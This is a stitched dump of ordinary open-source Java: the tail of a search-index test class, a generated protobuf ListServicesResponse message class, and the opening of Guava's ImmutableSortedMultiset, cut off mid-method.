IntegerScaleIndexBinding { IndexFieldReference<BigInteger> scaled; IntegerScaleIndexBinding(IndexSchemaElement root, int decimalScale) { scaled = root.field( "scaled", f -> f.asBigInteger().projectable( Projectable.YES ).decimalScale( decimalScale ) ) .toReference(); } } private static class DefaultIntegerScaleIndexBinding { IndexFieldReference<BigInteger> scaled; DefaultIntegerScaleIndexBinding(IndexedEntityBindingContext ctx) { scaled = ctx.schemaElement() .field( "scaled", ctx.createTypeFactory( new IndexFieldTypeDefaultsProvider( -2 ) ).asBigInteger() ) .toReference(); } } private static class BothIntegerScaleIndexBinding { IndexFieldReference<BigInteger> scaled; BothIntegerScaleIndexBinding(IndexedEntityBindingContext ctx) { scaled = ctx.schemaElement() // setting both default decimal scale .field( "scaled", ctx.createTypeFactory( new IndexFieldTypeDefaultsProvider( -2 ) ) // and the not-default decimal scale .asBigInteger().decimalScale( -3 ) ) .toReference(); } } }
googleapis/google-cloud-java
35,754
java-service-usage/proto-google-cloud-service-usage-v1/src/main/java/com/google/api/serviceusage/v1/ListServicesResponse.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/api/serviceusage/v1/serviceusage.proto // Protobuf Java Version: 3.25.8 package com.google.api.serviceusage.v1; /** * * * <pre> * Response message for the `ListServices` method. * </pre> * * Protobuf type {@code google.api.serviceusage.v1.ListServicesResponse} */ public final class ListServicesResponse extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.api.serviceusage.v1.ListServicesResponse) ListServicesResponseOrBuilder { private static final long serialVersionUID = 0L; // Use ListServicesResponse.newBuilder() to construct. 
private ListServicesResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListServicesResponse() { services_ = java.util.Collections.emptyList(); nextPageToken_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListServicesResponse(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.api.serviceusage.v1.ListServicesResponse.class, com.google.api.serviceusage.v1.ListServicesResponse.Builder.class); } public static final int SERVICES_FIELD_NUMBER = 1; @SuppressWarnings("serial") private java.util.List<com.google.api.serviceusage.v1.Service> services_; /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public java.util.List<com.google.api.serviceusage.v1.Service> getServicesList() { return services_; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public java.util.List<? extends com.google.api.serviceusage.v1.ServiceOrBuilder> getServicesOrBuilderList() { return services_; } /** * * * <pre> * The available services for the requested project. 
* </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public int getServicesCount() { return services_.size(); } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public com.google.api.serviceusage.v1.Service getServices(int index) { return services_.get(index); } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ @java.lang.Override public com.google.api.serviceusage.v1.ServiceOrBuilder getServicesOrBuilder(int index) { return services_.get(index); } public static final int NEXT_PAGE_TOKEN_FIELD_NUMBER = 2; @SuppressWarnings("serial") private volatile java.lang.Object nextPageToken_ = ""; /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ @java.lang.Override public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. 
*/ @java.lang.Override public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < services_.size(); i++) { output.writeMessage(1, services_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, nextPageToken_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < services_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, services_.get(i)); } if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(nextPageToken_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, nextPageToken_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.api.serviceusage.v1.ListServicesResponse)) { return super.equals(obj); } com.google.api.serviceusage.v1.ListServicesResponse other = (com.google.api.serviceusage.v1.ListServicesResponse) obj; if (!getServicesList().equals(other.getServicesList())) return false; if (!getNextPageToken().equals(other.getNextPageToken())) return false; if 
(!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getServicesCount() > 0) { hash = (37 * hash) + SERVICES_FIELD_NUMBER; hash = (53 * hash) + getServicesList().hashCode(); } hash = (37 * hash) + NEXT_PAGE_TOKEN_FIELD_NUMBER; hash = (53 * hash) + getNextPageToken().hashCode(); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static 
com.google.api.serviceusage.v1.ListServicesResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.api.serviceusage.v1.ListServicesResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.api.serviceusage.v1.ListServicesResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.api.serviceusage.v1.ListServicesResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == 
DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for the `ListServices` method. * </pre> * * Protobuf type {@code google.api.serviceusage.v1.ListServicesResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.api.serviceusage.v1.ListServicesResponse) com.google.api.serviceusage.v1.ListServicesResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.api.serviceusage.v1.ServiceUsageProto .internal_static_google_api_serviceusage_v1_ListServicesResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.api.serviceusage.v1.ListServicesResponse.class, com.google.api.serviceusage.v1.ListServicesResponse.Builder.class); } // Construct using com.google.api.serviceusage.v1.ListServicesResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (servicesBuilder_ == null) { services_ = java.util.Collections.emptyList(); } else { services_ = null; servicesBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); nextPageToken_ = ""; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.api.serviceusage.v1.ServiceUsageProto 
.internal_static_google_api_serviceusage_v1_ListServicesResponse_descriptor; } @java.lang.Override public com.google.api.serviceusage.v1.ListServicesResponse getDefaultInstanceForType() { return com.google.api.serviceusage.v1.ListServicesResponse.getDefaultInstance(); } @java.lang.Override public com.google.api.serviceusage.v1.ListServicesResponse build() { com.google.api.serviceusage.v1.ListServicesResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.api.serviceusage.v1.ListServicesResponse buildPartial() { com.google.api.serviceusage.v1.ListServicesResponse result = new com.google.api.serviceusage.v1.ListServicesResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.api.serviceusage.v1.ListServicesResponse result) { if (servicesBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { services_ = java.util.Collections.unmodifiableList(services_); bitField0_ = (bitField0_ & ~0x00000001); } result.services_ = services_; } else { result.services_ = servicesBuilder_.build(); } } private void buildPartial0(com.google.api.serviceusage.v1.ListServicesResponse result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000002) != 0)) { result.nextPageToken_ = nextPageToken_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder 
setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.api.serviceusage.v1.ListServicesResponse) { return mergeFrom((com.google.api.serviceusage.v1.ListServicesResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.api.serviceusage.v1.ListServicesResponse other) { if (other == com.google.api.serviceusage.v1.ListServicesResponse.getDefaultInstance()) return this; if (servicesBuilder_ == null) { if (!other.services_.isEmpty()) { if (services_.isEmpty()) { services_ = other.services_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensureServicesIsMutable(); services_.addAll(other.services_); } onChanged(); } } else { if (!other.services_.isEmpty()) { if (servicesBuilder_.isEmpty()) { servicesBuilder_.dispose(); servicesBuilder_ = null; services_ = other.services_; bitField0_ = (bitField0_ & ~0x00000001); servicesBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getServicesFieldBuilder() : null; } else { servicesBuilder_.addAllMessages(other.services_); } } } if (!other.getNextPageToken().isEmpty()) { nextPageToken_ = other.nextPageToken_; bitField0_ |= 0x00000002; onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.api.serviceusage.v1.Service m = input.readMessage( com.google.api.serviceusage.v1.Service.parser(), extensionRegistry); if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.add(m); } else { servicesBuilder_.addMessage(m); } break; } // case 10 case 18: { nextPageToken_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.api.serviceusage.v1.Service> services_ = java.util.Collections.emptyList(); private void ensureServicesIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { services_ = new java.util.ArrayList<com.google.api.serviceusage.v1.Service>(services_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.api.serviceusage.v1.Service, com.google.api.serviceusage.v1.Service.Builder, com.google.api.serviceusage.v1.ServiceOrBuilder> servicesBuilder_; /** * 
* * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public java.util.List<com.google.api.serviceusage.v1.Service> getServicesList() { if (servicesBuilder_ == null) { return java.util.Collections.unmodifiableList(services_); } else { return servicesBuilder_.getMessageList(); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public int getServicesCount() { if (servicesBuilder_ == null) { return services_.size(); } else { return servicesBuilder_.getCount(); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.Service getServices(int index) { if (servicesBuilder_ == null) { return services_.get(index); } else { return servicesBuilder_.getMessage(index); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder setServices(int index, com.google.api.serviceusage.v1.Service value) { if (servicesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureServicesIsMutable(); services_.set(index, value); onChanged(); } else { servicesBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The available services for the requested project. 
* </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder setServices( int index, com.google.api.serviceusage.v1.Service.Builder builderForValue) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.set(index, builderForValue.build()); onChanged(); } else { servicesBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addServices(com.google.api.serviceusage.v1.Service value) { if (servicesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureServicesIsMutable(); services_.add(value); onChanged(); } else { servicesBuilder_.addMessage(value); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addServices(int index, com.google.api.serviceusage.v1.Service value) { if (servicesBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureServicesIsMutable(); services_.add(index, value); onChanged(); } else { servicesBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addServices(com.google.api.serviceusage.v1.Service.Builder builderForValue) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.add(builderForValue.build()); onChanged(); } else { servicesBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The available services for the requested project. 
* </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addServices( int index, com.google.api.serviceusage.v1.Service.Builder builderForValue) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.add(index, builderForValue.build()); onChanged(); } else { servicesBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder addAllServices( java.lang.Iterable<? extends com.google.api.serviceusage.v1.Service> values) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, services_); onChanged(); } else { servicesBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder clearServices() { if (servicesBuilder_ == null) { services_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { servicesBuilder_.clear(); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public Builder removeServices(int index) { if (servicesBuilder_ == null) { ensureServicesIsMutable(); services_.remove(index); onChanged(); } else { servicesBuilder_.remove(index); } return this; } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.Service.Builder getServicesBuilder(int index) { return getServicesFieldBuilder().getBuilder(index); } /** * * * <pre> * The available services for the requested project. 
* </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.ServiceOrBuilder getServicesOrBuilder(int index) { if (servicesBuilder_ == null) { return services_.get(index); } else { return servicesBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public java.util.List<? extends com.google.api.serviceusage.v1.ServiceOrBuilder> getServicesOrBuilderList() { if (servicesBuilder_ != null) { return servicesBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(services_); } } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.Service.Builder addServicesBuilder() { return getServicesFieldBuilder() .addBuilder(com.google.api.serviceusage.v1.Service.getDefaultInstance()); } /** * * * <pre> * The available services for the requested project. * </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public com.google.api.serviceusage.v1.Service.Builder addServicesBuilder(int index) { return getServicesFieldBuilder() .addBuilder(index, com.google.api.serviceusage.v1.Service.getDefaultInstance()); } /** * * * <pre> * The available services for the requested project. 
* </pre> * * <code>repeated .google.api.serviceusage.v1.Service services = 1;</code> */ public java.util.List<com.google.api.serviceusage.v1.Service.Builder> getServicesBuilderList() { return getServicesFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.api.serviceusage.v1.Service, com.google.api.serviceusage.v1.Service.Builder, com.google.api.serviceusage.v1.ServiceOrBuilder> getServicesFieldBuilder() { if (servicesBuilder_ == null) { servicesBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.api.serviceusage.v1.Service, com.google.api.serviceusage.v1.Service.Builder, com.google.api.serviceusage.v1.ServiceOrBuilder>( services_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); services_ = null; } return servicesBuilder_; } private java.lang.Object nextPageToken_ = ""; /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return The nextPageToken. */ public java.lang.String getNextPageToken() { java.lang.Object ref = nextPageToken_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); nextPageToken_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return The bytes for nextPageToken. */ public com.google.protobuf.ByteString getNextPageTokenBytes() { java.lang.Object ref = nextPageToken_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); nextPageToken_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. 
* </pre> * * <code>string next_page_token = 2;</code> * * @param value The nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageToken(java.lang.String value) { if (value == null) { throw new NullPointerException(); } nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @return This builder for chaining. */ public Builder clearNextPageToken() { nextPageToken_ = getDefaultInstance().getNextPageToken(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Token that can be passed to `ListServices` to resume a paginated * query. * </pre> * * <code>string next_page_token = 2;</code> * * @param value The bytes for nextPageToken to set. * @return This builder for chaining. */ public Builder setNextPageTokenBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); nextPageToken_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.api.serviceusage.v1.ListServicesResponse) } // @@protoc_insertion_point(class_scope:google.api.serviceusage.v1.ListServicesResponse) private static final com.google.api.serviceusage.v1.ListServicesResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.api.serviceusage.v1.ListServicesResponse(); } public static com.google.api.serviceusage.v1.ListServicesResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final 
com.google.protobuf.Parser<ListServicesResponse> PARSER = new com.google.protobuf.AbstractParser<ListServicesResponse>() { @java.lang.Override public ListServicesResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<ListServicesResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<ListServicesResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.api.serviceusage.v1.ListServicesResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
google/guava
36,031
android/guava/src/com/google/common/collect/ImmutableSortedMultiset.java
/*
 * Copyright (C) 2011 The Guava Authors
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
 * in compliance with the License. You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software distributed under the
 * License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
 * express or implied. See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.google.common.collect;

import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;

import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.math.IntMath;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import com.google.errorprone.annotations.DoNotCall;
import com.google.errorprone.annotations.concurrent.LazyInit;
import java.io.InvalidObjectException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.Comparator;
import java.util.Iterator;
import java.util.List;
import java.util.function.Function;
import java.util.function.ToIntFunction;
import java.util.stream.Collector;
import org.jspecify.annotations.Nullable;

/**
 * A {@link SortedMultiset} whose contents will never change, with many other important properties
 * detailed at {@link ImmutableCollection}.
 *
 * <p><b>Warning:</b> as with any sorted collection, you are strongly advised not to use a {@link
 * Comparator} or {@link Comparable} type whose comparison behavior is <i>inconsistent with
 * equals</i>. That is, {@code a.compareTo(b)} or {@code comparator.compare(a, b)} should equal zero
 * <i>if and only if</i> {@code a.equals(b)}. If this advice is not followed, the resulting
 * collection will not correctly obey its specification.
 *
 * <p>See the Guava User Guide article on <a href=
 * "https://github.com/google/guava/wiki/ImmutableCollectionsExplained">immutable collections</a>.
 *
 * @author Louis Wasserman
 * @since 12.0
 */
// Implementation note: concrete instances are RegularImmutableSortedMultiset, which pairs a
// RegularImmutableSortedSet of distinct elements with a parallel array of cumulative counts.
@GwtIncompatible // hasn't been tested yet
public abstract class ImmutableSortedMultiset<E> extends ImmutableMultiset<E>
    implements SortedMultiset<E> {
  // TODO(lowasser): GWT compatibility

  /**
   * Returns a {@code Collector} that accumulates the input elements into a new {@code
   * ImmutableMultiset}. Elements are sorted by the specified comparator.
   *
   * <p><b>Warning:</b> {@code comparator} should be <i>consistent with {@code equals}</i> as
   * explained in the {@link Comparator} documentation.
   *
   * @since 33.2.0 (available since 21.0 in guava-jre)
   */
  @IgnoreJRERequirement // Users will use this only if they're already using streams.
  public static <E> Collector<E, ?, ImmutableSortedMultiset<E>> toImmutableSortedMultiset(
      Comparator<? super E> comparator) {
    // Delegates to the general form: identity element mapping, count of 1 per occurrence.
    return toImmutableSortedMultiset(comparator, Function.identity(), e -> 1);
  }

  /**
   * Returns a {@code Collector} that accumulates elements into an {@code ImmutableSortedMultiset}
   * whose elements are the result of applying {@code elementFunction} to the inputs, with counts
   * equal to the result of applying {@code countFunction} to the inputs.
   *
   * <p>If the mapped elements contain duplicates (according to {@code comparator}), the first
   * occurrence in encounter order appears in the resulting multiset, with count equal to the sum of
   * the outputs of {@code countFunction.applyAsInt(t)} for each {@code t} mapped to that element.
   *
   * @since 33.2.0 (available since 22.0 in guava-jre)
   */
  @IgnoreJRERequirement // Users will use this only if they're already using streams.
  public static <T extends @Nullable Object, E>
      Collector<T, ?, ImmutableSortedMultiset<E>> toImmutableSortedMultiset(
          Comparator<? super E> comparator,
          Function<? super T, ? extends E> elementFunction,
          ToIntFunction<? super T> countFunction) {
    checkNotNull(comparator);
    checkNotNull(elementFunction);
    checkNotNull(countFunction);
    // Accumulate into a mutable TreeMultiset (keeps entries sorted as we go), then snapshot the
    // already-sorted entry set in the finisher.
    return Collector.of(
        () -> TreeMultiset.create(comparator),
        (multiset, t) -> mapAndAdd(t, multiset, elementFunction, countFunction),
        (multiset1, multiset2) -> {
          multiset1.addAll(multiset2);
          return multiset1;
        },
        (Multiset<E> multiset) -> copyOfSortedEntries(comparator, multiset.entrySet()));
